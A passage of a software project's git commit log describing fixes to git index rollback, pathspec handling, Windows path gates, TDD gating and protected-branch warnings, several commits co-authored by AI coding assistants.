`nothing_to_commit` -- the same false "no state changed" the restore exists to
prevent, surviving one level down on the restore-failure path.

It now returns a boolean. The two no-change exits report `staging_failed`
naming the paths left staged; the staging-failure rollback still ignores it,
deliberately, because it is already reporting a failure and an unwritable index
is usually the failure being reported.

Driven with a post-index-change hook that makes the git dir unwritable the
moment `rm --cached` lands, so the restore cannot take its lock. Reverting both
guards fails the test.

Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_016gyGdweAdAG6nFv9Jx32vj

* fix(#4208): disclose a removal the rollback could not restore

Round review refuted the reasoning behind leaving the rollback path's restore
unchecked. The claim was that this exit is already reporting a failure, so the
restore's result adds nothing. The counterexample is the ordinary case: the
reported failure is usually a DIFFERENT cause -- a contradictory declaration, a
reappeared path -- so a caller reading `failures` sees only that cause and
learns nothing about the removal still sitting in its index.

The rollback now appends a disclosure entry per un-restored removal, naming the
path. The reason and `file` still report the failure that caused the rollback;
the disclosure is additive.

Also moves the restore-failure test's chmod into a `finally`: `t.after` runs
AFTER the parent `afterEach`, so a throw before it left the fixture undeletable.

Both driven; reverting the disclosure fails the new test.

Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_016gyGdweAdAG6nFv9Jx32vj

* fix(#4208): decide index state by observation, never by an exit code

The restore added two commits earlier keyed both its record decision and its
success verdict on git's exit code. An exit code answers "did the command
succeed", never "did the index change" -- execGit collapses a spawn timeout to
a non-zero exit, and a killed git can already have written the index. Round
review drove four failures from that one assumption, in both directions:

  - a failed `rm` still contributed an entry, so the rollback disclosed a
    removal that was never staged (stale index.lock);
  - a timed-out `rm` whose write DID land contributed none, so a real mutation
    was neither restored nor disclosed;
  - a timed-out `update-index` whose write landed reported failure, publishing
    a "could NOT be restored" disclosure that was false;
  - and the read-back that replaced it omitted `-z`, so core.quotePath rendered
    `café.md` as `"caf\303\251.md"` and an exactly-restored entry read as not
    restored -- the same quoting defect this PR already fixed for `preStaged`.

Everything now observes the index. A failed `rm` re-reads `ls-files -z` for the
path: gone means this call owns the removal and records it; still there means
nothing was staged; a probe that cannot answer becomes its own failure entry
rather than an assumption. The restore verifies the same way, comparing the
WHOLE entry (mode, blob, stage), because `--cacheinfo` restores all three and a
path-only test accepts an entry that came back as something else.

The verdict is three-valued -- `restored` / `not-restored` / `unverified` --
and the unverified wording says the restore could not be VERIFIED rather than
that it failed. The rm's own failure is pushed ahead of any probe diagnostic so
a timed-out removal keeps `timed_out: true` and its own message as the reported
cause.

Five regression cases, each negative-controlled against the shape it pins.

Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_016gyGdweAdAG6nFv9Jx32vj

* fix(#4208): treat a declared removal path as a path, not a pathspec

An index path handed back to git is parsed as a PATHSPEC, and the removal side
handed several back. Three driven harms, all of them the sweep-in this flag
exists to remove, arriving through the operand rather than through a directory
entry:

  - a tracked file literally named `.planning/*.md` made `rm --cached` GLOB: it
    removed `peer.md` and `stays.md` too, only the declared entry was recorded,
    so the rollback restored one of three and the other two rode out as staged
    deletions the result disclosed nowhere;
  - the same name reached `git commit -- <paths>`, which globbed and committed
    an undeclared `M peer.md` alongside the declared removal;
  - and the intent-to-add probe (`diff --cached` over the path) matched a
    STAGED PEER instead of itself, so an `add -N` entry was misclassified as
    ordinary content, removed, and restored by `--cacheinfo` -- which cannot
    restore the intent flag. It came back as a real staged addition.

Every operand on this path is now `:(literal)`: the `rm`, both index probes,
the intent-to-add probe, the restore read-back, the entry-level `ls-files` /
`ls-tree`, and -- for the REMOVAL-derived entries only -- the downstream
`ls-files` / dry-run / `diff HEAD` / `commit` pathspec. `--files` entries keep
whatever pathspec behaviour they have today; that is not this change's to
alter. `:(literal)` still resolves a directory to its descendants (driven), so
the directory form is unchanged.

Closes what an earlier cut of this commit declared as a residual: a filename
beginning with `:` is now removable end to end, because the commit pathspec no
longer reinterprets it.

Also fixes a MINOR from the same review: cleanup.md's contract test checked the
destinations' position relative to `--files-removed` but never that `--files`
was present at all, so deleting the flag still passed.

Un-literalising the seven sites fails three of the new tests.

Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_016gyGdweAdAG6nFv9Jx32vj

* fix(#4208): scope the rollback to the caller's own name space

Round review drove a rollback that destroyed the caller's own staged work. Two
causes, one of them pre-existing:

  - `git diff --cached` prints REPO-relative paths whatever the cwd, while
    `stagedPaths` holds the caller's cwd-relative names. In a project nested
    inside its repo (`<repo>/sub/.planning/...`) the two name spaces never
    intersect, so `preStaged` matched NOTHING, every path landed in `toUnstage`,
    and the reset unstaged a caller-staged deletion and modification that this
    call had never touched. `--relative` makes the two sets comparable, and is a
    no-op when the project IS the repo root. This governs the `--files` side too
    and predates this flag.
  - the rollback's `reset` was the last place a removal-derived name reached git
    as a bare pathspec; it takes `asPathspec` like every other site.

Driven on a nested fixture; dropping `--relative` fails the new test.

Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_016gyGdweAdAG6nFv9Jx32vj

* test(#4208): gate six fixtures that Windows cannot construct

CI's `test (windows-latest, 24, shard 2/3)` went red on this round. Two
primitives the new fixtures rely on do not exist on Windows, both driven on a
real Windows host rather than inferred:

  - a filename containing `*` or `:` cannot be created at all (`IOException` /
    `FileNotFoundException`), which is four of the pathspec fixtures;
  - `chmod` cannot make a directory unwritable — a write into a ReadOnly
    directory succeeds — so the two restore-failure fixtures cannot drive the
    failure they exist to drive.

Each is skipped on win32 with its measured reason, in the repo's existing
`{ skip: process.platform === 'win32' ? '<reason>' : false }` form. The
behaviours they pin are platform-independent; only the fixtures are not.

Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_016gyGdweAdAG6nFv9Jx32vj

* test(#4208): build git's index-syntax path with forward slashes

The remaining Windows red was mine, not the platform's: `git rev-parse :<path>`
takes a forward-slash path, and `path.join` yields backslashes there, so git
rejected it as an ambiguous argument. The hook in the same test already used
the slash form.

Not gated — the behaviour it pins is portable; only the argument was not.

Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_016gyGdweAdAG6nFv9Jx32vj

* chore(#4208): refresh the compact-content baseline against the rebased base

`next` moved the `new-project` split and the aggregate under this PR's
execute-phase entry; regenerated with `scripts/benchmark-compact-content.cjs
--write` so the only leaves differing from the base's copy are the
execute-phase split and the aggregate it feeds.

Co-Authored-By: Claude Fable 5.1 <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_01FUcGM4FWeZV4cqvR7QBtJh

* chore(#4208): regenerate the macOS conformance tier for this PR's fixtures

`next` gained the macOS-specific conformance tier (#4593) after this branch
was cut. Its classifier (`scripts/gen-platform-conformance-tier.cjs --target
macos`) now selects `tests/commit-files-deletion.test.cjs` on the
`chmod-mode-bit` and `symlink-keyword` signals the PR's fixtures carry (the
chmod-driven failed-restore cases and the symlink-to-directory case).
Regenerated with `--target macos --write`; the platform tier was already in
sync. The file was modified, not added, which is why the added-files check
did not surface it.

Co-Authored-By: Claude Fable 5.1 <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_01FUcGM4FWeZV4cqvR7QBtJh

---------

Co-authored-by: Claude Opus 5 (1M context) <noreply@anthropic.com>
Co-authored-by: CI Rebase Check <ci@gsd-redux>
Co-authored-by: Tom Boucher <trekkie@nomorestars.com>
2026-09-11 12:26:55 -04:00
Tom Boucher
e03921c7d8 enhance(#4405): split the rest of the eager-window workflows worth splitting (#4536) 2026-09-08 00:17:22 -04:00
Tom Boucher
476394689a fix(#4254): pin sequential executor to the orchestrator's validated root (#4476)
* test(#4254): sequential executor root pin — failing-first regression + matrix

The new suite executes the shipped supplied-root-pin guard against real git
fixtures (drifted primary-checkout cwd halts before the write and the FATAL
names both roots; matching cwd permits it; unexpanded/empty pins halt;
normalization forms; submodule and sibling boundaries; metacharacter quoting;
drive-letter form gate) and locks the dispatch contract across execute-phase.md,
its sequential-root-pin step fragment, and worktree-path-safety.md. The #2772
per-plan serialization assertion retargets to the fragment that now carries
those rules (ADR-857 Phase 6 ceiling), plus the host-step wiring.

* fix(#4254): pin sequential executor to the orchestrator's validated root

Sequential-mode dispatch told the executor to self-derive PROJECT_ROOT from its
own cwd; every existing guard is worktree-mode-only or self-referential, so an
executor spawned with a drifted cwd committed onto the wrong checkout silently.

- worktree-path-safety.md step 0p: mode-agnostic supplied-root pin guard,
  composed by the orchestrator at build time with the literal $ORCHESTRATOR_WT
  (git-vs-git comparison on both sides — representation-safe on Windows, the
  #4296 lesson), fail-closed on empty/unexpanded pins, registered-submodule
  allowance, warn-and-proceed only when the dispatch carries no pin block.
- execute-phase.md sequential branch: build-time embed of the bound
  <project_root_pin> via the new execute-phase/steps/sequential-root-pin.md
  fragment (ADR-857 Phase 6 frozen ceiling — the host step cannot grow; the
  wave serialization rules move with the fragment, verbatim in substance) plus
  the per-write/commit pin instruction in <sequential_execution>. Worktree-mode
  dispatch untouched (its self-derived toplevel IS correct there).
- INVENTORY rows (5 locales) + INVENTORY-MANIFEST + install-tree goldens
  regenerated for the new fragment; changeset added.

* chore(#4254): backfill changeset PR number

* fix(#4254): accept backslash-separated Windows drive pins

CI on windows-latest showed every permit-path test failing with
"Actual root: <none>": pins composed from Node's path.join arrive in the
backslash drive form (C:\Users\RUNNER~1\...), which the guard's absolute-form
gate rejected before the cwd-side root was ever computed — a legitimate
matching pin could never pass. The gate now accepts either separator
([A-Za-z]:[\\/]); git -C resolves both forms (and 8.3 short names) to the
same canonical toplevel, so the git-vs-git comparison is unaffected. Form-gate
tests cover the emitted (C:/…) and produced (C:\…) spellings plus short names.

* fix(#4254): portable drive-form gate for MSYS bash

The bracket class [\\/] that accepted backslash drive pins parses
inconsistently on MSYS bash (the Windows CI leg still rejected C:\ pins —
every permit-path test red with "Actual root: <none>"). Replace it with
standard pattern escaping outside brackets: [A-Za-z]:/*|[A-Za-z]:\\* —
the escape form is version- and build-portable. Verified across all forms:
both drive spellings accepted; bare "C:", relative, empty, and unexpanded
rejected.

* fix(#4254): runtime-generated backslash comparator + self-describing FATAL

The Windows CI legs failed every #4254 permit-path row with
'Actual root: <none>' across two prior pattern spellings ([\\/] and \\*).
Stage misattribution: <none> appears whenever the FATAL fires BEFORE the
cwd-side capture assigns ACTUAL_ROOT — the absolute-form gate was what fired.

Mechanism: the test harness spawns bash -c <script> through the Windows
command-line boundary; that round-trip applies one extra shell-quoting pass
with double-quote semantics — a backslash written twice in the script text
arrives halved, while a lone backslash survives (the pin displays intact;
row 9's pure-bash gate independently showed the halved pattern rejecting
C:\ while C:/ still passed its surviving arm). On windows-latest every pin
carries backslashes (os.tmpdir() is the 8.3 short form C:\Users\RUNNER~1\...),
so the gate ate every pin before the actual root was ever computed.

Fix, robust by construction:
- the drive-form gate generates its backslash comparator at RUNTIME
  (BS=$(printf '\134'); match [A-Za-z]:"$BS"*) — the shipped guard now
  contains no doubled backslash anywhere, enforced by a regression
  assertion on the extracted guard text;
- the FATAL self-describes: Guard stage (pin-unbound / form-gate /
  actual-capture / pinned-capture / root-mismatch) plus a Diagnostic line
  carrying git's own stderr for capture failures and both compared values
  for mismatches — future platform failures name their stage in the log;
- row 9's hand-rolled duplicate case gate (transit-fragile copy, #4296
  Minor 1 duplication smell) is replaced by driving the SHIPPED guard and
  asserting the stage; rows 2/4 pin the new stage machinery.

Validated on darwin across drift/match/relative/unbound/empty/bare-drive/
forward-and-backslash drive forms, each also re-run under a simulated
Windows transit (every doubled backslash halved) with identical outcomes.

* fix(#4254): close the empty-comparator fail-open seam in the drive-form gate

Self-review of the runtime-generated backslash comparator: if printf's
octal escape ever returned empty, the drive arm [A-Za-z]:"$BS"* would
widen to drive-RELATIVE pins (C:foo) — the construction's one theoretical
fail-open path. Fail closed with a self-describing diagnostic instead of
trusting the shell's printf.

---------

Co-authored-by: sim <sim@local>
2026-09-07 10:54:30 -04:00
Tom Boucher
2cf119f57e fix(#4217): reconcile artifacts before classifying an abnormally-ended executor (#4442)
* fix(#4217): reconcile artifacts before classifying abnormal ends

* test(#4217): pin the completion-reconciliation contract

* chore(#4217): regen derived inventory and install-tree fixtures

* test(#4217): follow the #4003 anchoring pins into the reconciliation fragment

Emitted-Drift-Ack-Growth: execute-phase.md — the runtime-neutral completion-reconciliation pointer, the two Codex wait-rule bindings, and the step-7 reconcile-first gate net +33 bytes over the extracted fallback block (#4217)

* chore(#4217): add changeset fragment

* chore(#4217): backfill PR number in changeset fragment

---------

Co-authored-by: sim <sim@local>
2026-09-06 18:57:38 -04:00
Michel Moreira
19b66c3ec8 fix(#4218): stop the orchestrator steering an executor that is still working (#4391)
* fix(#4218): stop the orchestrator steering an executor that is still working

An executor with recent RED/GREEN/REFACTOR commits and passing verification had
not yet written its SUMMARY because it was finishing closeout. The parent saw no
local OS test/build process, inferred an "idle tail", and sent "Finalize
immediately" into a working child; in CLI runs the same inference interrupted an
executor before GREEN, leaving a RED commit and an uncommitted edit.

The stall block said only "if no completion signal, no SUMMARY.md, and no
expected-branch commits appear for N minutes" — it never said what to do when
commits DO exist and only the SUMMARY is outstanding, never defined the
threshold as a period without progress rather than a total runtime, and never
ruled out a process listing as an idleness signal. Four rules close that:

- the threshold measures a period WITHOUT MEANINGFUL PROGRESS, from the last
  sign of progress, not from dispatch — a long verification tail is not a stall;
- commits + missing SUMMARY + recent activity resolves to KEEP WAITING, with
  steering, interrupting and re-dispatching each named and forbidden;
- urgency/finalization messages ("Finalize immediately" and family) are
  forbidden outright — they arrive mid-verification and truncate a correct run.
  The existing user-facing pause is the only sanctioned stop, and `kill and
  retry` is a clean restart, not a nudge;
- the absence of a local OS test/build process is NOT idleness: a native
  subagent runs in the runtime's own session, and an executor between two tool
  calls shows no process at all. Progress is judged only by the signals this
  workflow names.

Five prose-contract assertions in tests/execute-phase-wave.test.cjs, all red on
next.

* fix(#4218): extract the progress policy to a step fragment

CI's #1168 gate caught it: execute-phase.md sits 77 bytes under a frozen 93600
ceiling and the four rules added ~2.3 KB. "Extract, not bump" is the repo's
stated remedy, and this workflow already carries policy detail that way.

execute-phase/steps/executor-progress-policy.md owns the policy. The
worktree-recovery arm moved with it — `kill and switch to inline execution`
qualifies the stop this policy governs, so it belongs beside the rule about when
stopping is sanctioned at all, not stranded in the host. The #3212 recovery
OPTIONS stay in the host, where tests/config.test.cjs pins them.

The host keeps what must be read before the orchestrator acts: the verdict, the
threshold definition, and a pointer that fires before any message is sent to the
child. execute-phase.md is now 93475 bytes — 48 SMALLER than next.

* chore: add changeset for #4218

* chore(#4218): regenerate the inventory manifest for the new step fragment

docs/INVENTORY-MANIFEST.json is the authoritative per-file list behind
INVENTORY.md's `<workflow>/steps/*.md` row, so a new fragment has to appear
there or gen-inventory-manifest --check reds the lint-tests lane.

* chore(#4218): restore the issue ref on the allow-test-rule marker

ADR-456 requires a #NNN on a new exemption; the block rewrite that moved the
policy into the fragment dropped it.

* chore(#4218): regenerate the install-tree fixtures for the new step fragment

The fragment ships with the workflow, so every runtime's golden install tree
gains one path — gen:install-tree is the generator that owns those fixtures.

---------

Co-authored-by: Tom Boucher <trekkie@nomorestars.com>
2026-09-06 17:51:34 -04:00
Dennis Alexis Valin Dittrich
a262ad6b61 fix(#4148): dispatch wave-pre step hooks (#4185)
* fix(#4148): dispatch wave-pre step hooks

External capabilities can render step hooks before a wave, but the execute workflow consumed only contributions and silently skipped every step. Reuse the shared dispatch contract before executor spawning and pin the capability-validator boundary with a red-first regression.

Emitted-Drift-Ack-Growth: execute-phase.md — wave-pre now carries the missing generic step-dispatch contract before executor spawning

* test(#4148): pin wave-pre dispatch ordering

* test(#4148): pin wave-pre dispatch contract

* chore(#4148): bind upstream changeset PR

* chore(#4148): restore fork changeset identity

* fix(#4148): align wave-pre dispatch contract

Mirror the sibling wave-post all-shapes clarification while pruning redundant prose so the rebased workflow remains below its frozen byte ceiling.

Emitted-Drift-Ack-Growth: execute-phase.md — wave-pre now carries the missing generic step-dispatch contract before executor spawning

* chore(#4148): restore upstream changeset identity

* fix(#4148): align wave-pre capability guidance

* docs(#4148): identify wave-pre manifest input

Name the third-party manifest trust origin at the wave-pre dispatch boundary so the reviewer-requested validation guidance matches wave-post.

Emitted-Drift-Ack-Growth: execute-phase.md — wave-pre now carries the missing generic step-dispatch contract before executor spawning

* docs(#4148): preserve execute-phase byte budget

Remove a redundant advisory label while retaining the non-blocking contract, keeping the reviewer-required trust-boundary wording at the enforced 93,400-byte ceiling.

* fix(#4148): mark wave-pre manifest-input validation as security-relevant

Reviewer nit on PR #4185: wave-pre's step-dispatch sentence had the
(third-party manifest input) parenthetical but dropped the ⚠ marker
that wave-post's parallel sentence (execute-phase.md:1044) carries,
losing the visual flag that this validation is security-motivated.

Trims the redundant "of one" from "not one shape of one" to reclaim
the 4 bytes the marker adds — the ADR-857 byte-margin gate
(tests/claude-orchestration.test.cjs) leaves zero slack at the
93,400-byte ceiling.

* fix(#4148): trim wave-pre step-dispatch prose to clear ADR-857 byte ceiling

Merging next's unrelated growth (#3990's TDD_APPLICABLE conditional) pushed
execute-phase.md 116 bytes past the 93,400-byte ceiling, failing CI on all
three platforms. The security-relevant ⚠ marker and ref.command validation
call-out (added per prior reviewer nit) are preserved verbatim per the
pinned regression test in capability-registry.test.cjs; only the
non-pinned connective prose is trimmed.

* fix(#4148): recalibrate execute-phase.md self-imposed margin, restore security marker

next grew execute-phase.md by ~230 bytes across two unrelated merges during
this fix (#3990's TDD_APPLICABLE conditional, then a further step-extraction
commit), consuming this test's own self-imposed 93,400 safety buffer under
ADR-857's actual, unmodified 93,600 ceiling (docs/adr/857-capability-system.md:22).
The wave-pre step-dispatch sentence cannot shrink further without dropping one
of the pinned substrings this same test file asserts on (kind=="step",
loop-hook-dispatch, never blocks or redirects executor spawning, Validate
`ref.command`).

Raises the self-imposed margin to 93,550 (still 50 bytes under the real,
untouched ADR ceiling) and restores the ⚠ marker the prior reviewer round
required for the ref.command validation call-out, which byte pressure had
dropped.

* fix(#4148): restore full ref.command validation wording, drop self-imposed margin

Adversarial review (agy/gemini-3.8-flash-high) flagged two issues in the prior
CI-recovery commit:

1. Trimming "in-context before any shell use" from the step-dispatch warning
   weakened the inline operational instruction (the reader is told WHAT to
   validate but not the specific in-context-not-shell mechanism the referenced
   loop-hook-dispatch.md:45-51 threat model requires). Restored it - the merge
   with next since the last commit freed enough real margin (77 bytes under
   the untouched 93,600 ADR-857 ceiling) to afford it without any margin
   change.

2. The prior commit self-imposed margin bump (93400 to 93550) was, on
   reflection, the wrong lever: it is a number this PR invented, not an ADR
   value, and re-bumping it every time next grows execute-phase.md is a
   losing pattern (already needed twice in one session). Removed the
   redundant assertion; the same line existing bytes-under-93600 check
   against the real, frozen ADR-857 ceiling (docs/adr/857-capability-system.md:22)
   is the actual invariant and is untouched. workflow-size-budget.test.cjs
   tier hard cap (98304 bytes, extract-not-bump by design) remains the
   correct backstop for runaway growth.

---------

Co-authored-by: CI Rebase Check <ci@gsd-redux>
Co-authored-by: Test <test@test.com>
Co-authored-by: Tom Boucher <trekkie@nomorestars.com>
2026-09-05 02:56:37 -04:00
Tom Boucher
2f4f7538e9 fix(#4264): wire both TDD dispatch backends to phase.tdd-applicable (#4284) 2026-09-04 16:08:42 -04:00
Tom Boucher
97ce61dee2 fix(#3990): state the RED/GREEN/REFACTOR cycle once, embed tdd.md conditionally (#4228)
* test(#3990): the RED/GREEN/REFACTOR cycle is stated once, embedded conditionally

* fix(#3990): state the cycle once — pointers in consumers, conditional tdd.md embeds

Emitted-Drift-Ack-Growth: execute-phase.md — #3990 conditions the tdd.md embed on the dispatch being TDD

* chore(#3990): changeset for the single-statement TDD cycle

* chore(#3990): backfill changeset pr number

* fix(#4228): linear cycle check — the lazy-span regex pinned a Windows core for the whole job cap

* test(#3990): allowlist pin tracks the rebased line

* fix(tests): npm-integrity gate names an empty audit output explicitly — empty stdout crashed the parse as a bare SyntaxError

* fix: name an empty npm-audit stdout explicitly — it crashed the parse as a bare SyntaxError

Observed on CI (several branches, all lanes): spawnSync npm ETIMEDOUT with
empty stdout; the empty string survived the recovery path and surfaced as
'SyntaxError: Unexpected end of JSON input', hiding the captured error. The
recovery path now requires non-empty stdout, and an empty result throws with
the captured stdout/stderr/message so the actual error is on the record.
Root cause of the ETIMEDOUT itself is NOT diagnosed here — this change only
stops masking it.

---------

Co-authored-by: sim <sim@local>
2026-09-03 21:41:14 -04:00
Tom Boucher
7c52344284 fix(#4003): anchor the safe-resume gate's plan-scope greps to the milestone (#4194)
* test(#4003): safe_resume_gate must grep an anchored padding-tolerant scope

* fix(#4003): anchor the resume-gate scope greps and bound them to the milestone tag

Emitted-Drift-Ack-Growth: execute-phase.md — #4003 rewrites three commit-scope greps (safe_resume_gate, TDD RED, completion spot-check) to anchored zero-pad-tolerant regexes with a milestone tag bound; growth is the fix itself

* test(#4003): align shape assertions with the implemented gate text

* fix: bump fast-uri past GHSA-jqff-g426-hqxp (transitive, advisory reddened next)

* fix(#4003): bound the TDD RED grep to the milestone and fix tdd.md's example greps

* test(#4003): the gate pin tracks the anchored scope grep

* fix(#4003): trim the gate rationale to hold the 93400 margin ceiling

* test(#4003): the RED-grep pin tracks the milestone-bounded invocation

* chore(#4003): changeset for the anchored resume-gate scope

* chore(#4003): backfill changeset pr number

---------

Co-authored-by: sim <sim@local>
2026-09-02 13:45:14 -04:00
Tom Boucher
acb903c2e8 enhance(#3661): make the code-review hook point configurable (#4159)
* feat(#3661): make the code-review hook point configurable

Add `workflow.code_review_point` (`execute:post` default, or
`execute:wave:post`) so a multi-wave phase can run code review once per
wave instead of once at the end, scoped to what changed since the phase's
prior review.

The code-review capability now declares its step at both loop points via a
new generic `pointFrom` step field: `pointFrom` names an enum config key,
and the step is only active at its own `point` when that key resolves to
a matching value. `_resolvePointGate` (capability-activation.cts) is the
single shared implementation consumed identically by loop-resolver.cts and
capability-state.cts, and capability-validator.cjs enforces that `pointFrom`
references an enum key whose values cover the declaring step's own point.

code-review.md's manual-invocation gate now reads `workflow.code_review`
directly instead of probing registry presence at the hardcoded execute:post
point (so manual `/gsd-code-review` keeps working regardless of which
automatic point is configured), and its file-scope tiers narrow to what
changed since the phase's last review commit when one exists.

execute-phase.md's wave-post step dispatch gets a small, precedented
carve-out so the code-review skill still receives its required phase
argument when dispatched generically (caught by the isolated spec review).

Closes #3661

Emitted-Drift-Ack-Growth: code-review.md — #3661 adds a point-aware config gate check and LAST_REVIEW_COMMIT-based incremental scoping to the file-scope tiers.
Emitted-Drift-Ack-Growth: execute-phase.md — #3661 adds one carve-out sentence so the wave-post generic step dispatch passes PHASE_NUMBER to the code-review skill.

* docs: backfill changeset PR number for #3661 (#4159)

* fix: scope tests/io.test.cjs's fs.writeSync fault-injection mocks by fd

Five fault-injection mocks in the "bug #1008" describe blocks intercepted
every fs.writeSync call regardless of file descriptor, and several threw or
truncated unconditionally on the first call. This surfaced as an
intermittent macOS CI failure: node:test's own IPC channel back to the
parent process (which also goes through fs.writeSync internally) could get
a bogus injected error or truncated write if node's internal machinery
called it while one of these mocks was active, corrupting the message
frame the parent tried to deserialize ("Unable to deserialize cloned
data.", location tests/io.test.cjs:1:1, uncaughtException — a whole-file
IPC crash, not a test assertion failure).

Root cause confirmed by a working counter-example already in the same
file: the "#3912 A6" mocks gate on `fd !== 2` before any fault injection
and were never implicated. Applied the same fd-scoped pattern to the five
unscoped mocks (four output()-targeting tests gate on fd 1, one
error()-targeting test gates on fd 2), and added a regression test proving
an unrelated fd passes through untouched while the fault-injection mock is
active.

Found while verifying #3661; unrelated to that change's own diff.

---------

Co-authored-by: sim <sim@local>
2026-09-02 11:01:54 -04:00
Tom Boucher
647365faf1 fix(#4011): key the TDD runtime gate on TDD_MODE alone (#4180)
* test(#4011): TDD gate keys on TDD_MODE alone, not the MVP intersection

Contract updates: no shipped line may conjoin MVP_MODE with TDD_MODE as
a gate condition, the end-of-phase escalation must not require MVP, the
executor agent's gate section triggers on TDD_MODE alone, and the gate
semantics reference loads without MVP_MODE.

* fix(#4011): key the TDD runtime gate on TDD_MODE alone

The RED-commit gate shipped as #76's MVP slice kept the paired
invocation's conjunct, so workflow.tdd_mode=true was silently inert on
every non-MVP phase, contradicting references/tdd.md's own contract.
Drops the MVP conjunct from the per-task gate and the end-of-phase
review escalation; rescopes execute-mvp-tdd.md's load condition,
gsd-executor's gate section, and mvp-concepts' intersection claim.
MVP remains free to imply TDD; the file is not renamed (stated
assumption in the PR body).

* test(#4011): scope no-conjunct detector to shell conditions; clean stale MVP+TDD phrasing

Review follow-ups: the detector now only inspects if/[ condition lines
so explanatory prose mentioning both flags cannot trip it; remaining
'under/outside MVP+TDD' phrases in execute-phase.md, the gate
reference, and docs/INVENTORY.md now describe TDD-mode semantics.

Emitted-Drift-Ack-Growth: execute-phase.md — TDD-gate decoupling comment + escalation rescoping (#4011)
Emitted-Drift-Ack-Growth: gsd-executor.md — gate section trigger rescoped to TDD_MODE alone (#4011)

* chore(#4011): backfill changeset pr number

---------

Co-authored-by: sim <sim@local>
2026-09-02 04:24:52 -04:00
Dennis Kim
8487f0ed42 enhance(#3552): warn on additional protected branches beyond the resolved base branch (#3648)
* test(01-01): add failing protected-branch warning coverage

- pin configured, absent, and malformed branch-list behavior
- require opposite CLI and execute warning outcomes

* feat(01-01): warn on configured protected branches

- resolve the base branch union configured protected branch names
- expose exact boolean CLI comparison output for workflow callers
- keep execute-phase warning advisory and within its byte budget

* test(01-01): add failing protected branch config coverage

- cover valid list persistence and null unset
- reject hostile shapes while preserving the prior value

* feat(01-01): validate protected branch configuration

- register git.protected_branches as a canonical config key
- require a non-empty array of non-blank branch names

* test(01-02): add failing ship protected-branch controls

- Execute both workflow warning blocks with exact predicate arguments
- Require true and false results to produce opposite warning outcomes
- Preserve the none-strategy feature-branch offer contract

* feat(01-02): warn at ship on protected branches

- Reuse the typed protected-branch predicate in ship preflight
- Keep raw base resolution for PR targeting and advisory branch creation
- Prove execute and ship warning blocks with opposite-result controls

* test(01-02): add failing protected-branch docs parity

- Require the canonical schema key in both English config references
- Pin the non-empty string-array type and absent default
- Require synchronized multi-branch examples and advisory semantics

* feat(01-02): publish protected branch configuration contract

- Document the optional non-empty string-array field in both references
- Explain resolved-base union and absent-field compatibility
- Keep execute and ship warnings advisory under branching_strategy none

* fix(01): CR-01 honor active workstream branch policy

* fix(01): WR-01 assert protected config path selection

* docs: add changeset fragment for #3648

Co-Authored-By: Claude Sonnet 5 <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_017CteVPJt4BkPmroMPGajYx

* fix(#3648): resolve base_branch precedence inversion and round-1 findings

Blocker 1/2: production config resolution was flat-first, so a project
that migrated to git.base_branch but still carried a stale flat
base_branch got the old value back. Add base_branch to
normalizeLegacyKeys (mirrors the existing branching_strategy/sub_repos
pattern: canonical nested wins) and route readEffectiveGitConfig's
test seam through the same normalization so it can't silently diverge
from production again. Adds a regression test with both keys set that
fails without the fix.

Blocker 3/4/5: restore the handle_branching case-selector prose and
"none" contract sentence that #3389's tests anchor on, and revert the
unrelated prose/comment compaction in the same step — both were
drive-by edits outside #3552's scope.

Also addresses review majors/minors: delete readConfigBaseBranch and
readConfigProtectedBranches (dead in production, only self-tested);
--is-protected now fails closed (reports protected) instead of
silently answering false when the base branch can't be verified;
trim configured protected-branch names; fix HOME-without-USERPROFILE
vacuous isolation on Windows; correct the drift-ack's byte accounting.

Co-Authored-By: Claude Sonnet 5 <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_01S44stkuQbhD3jTCtKzte5N

* test(#3648): add failing legacy-key hoist safety coverage

Round-2 review found normalizeLegacyKeys block 5 records a normalization
carrying the DISCARDED flat value on the canonical-wins branch. Probing
that turned up a second, unreported defect in the same helper shape:
blocks 1, 2 and 5 all spread result['git'] / result['planning'] with no
object guard, so a config whose section key holds a string is spread into
index keys —

  {"git":"main","base_branch":"release"}
    -> {"git":{"0":"m","1":"a","2":"i","3":"n","base_branch":"release"}}

The resolved value is accidentally still correct, so nothing fails and no
diagnostic fires. But normalizations.length > 0 sets configDirty, and
config-loader then serializes that shape back into the user's
config.json — a read that silently corrupts config.

The deleted #3057 W3 suite covered {"git":"main","base_branch":"release"}
explicitly; this is the input it would have caught.

Covers both defects across blocks 1 and 5, with object/array/null
negative controls that must stay green in both phases, and a fast-check
property over arbitrary `git` values.

* test(#3648): pin fail-closed handling of malformed protected_branches

Replaces the test that pinned the fail-OPEN behaviour. The old
assertion — ['develop', 42] yields isProtected === false for 'develop' —
locked in the exact failure #3552 exists to close: config-set validation
is bypassable by a direct edit of .planning/config.json, so a user who
believes 'develop' is protected got a silent false and no warning.

It was also inconsistent with the fail-CLOSED direction twelve lines
away, where an unverified base reports protected and writes a
diagnostic. A protection predicate must not have two opposite failure
directions depending on which input is bad (#3648 review Blocker 3).

New coverage: a bad element drops only itself, a non-array contributes
no names, an empty list is well-formed rather than malformed, and
--is-protected surfaces the rejection. Both negative controls — a clean
list reports nothing rejected and writes no diagnostic — must stay green
in either phase, so the reject channel cannot fire unconditionally.

* fix(#3648): drop only invalid protected_branches and report them

Partition git.protected_branches instead of discarding the whole list on
one bad element, and carry the rejections out through
ProtectedBranchStatus so --is-protected can name them on stderr. Valid
names keep protecting; the user finds out the rest were ignored.

A non-array value still contributes no names — a bare string is not a
list of branch names — but is now reported rather than swallowed. An
empty array stays silent: declaring no extra protected branches is a
valid choice, not a misconfiguration.

writeDiagnostic is hoisted out of the unverified-base branch since both
arms now use it.

* test(#3648): prove the predicate diagnostic survives both call sites

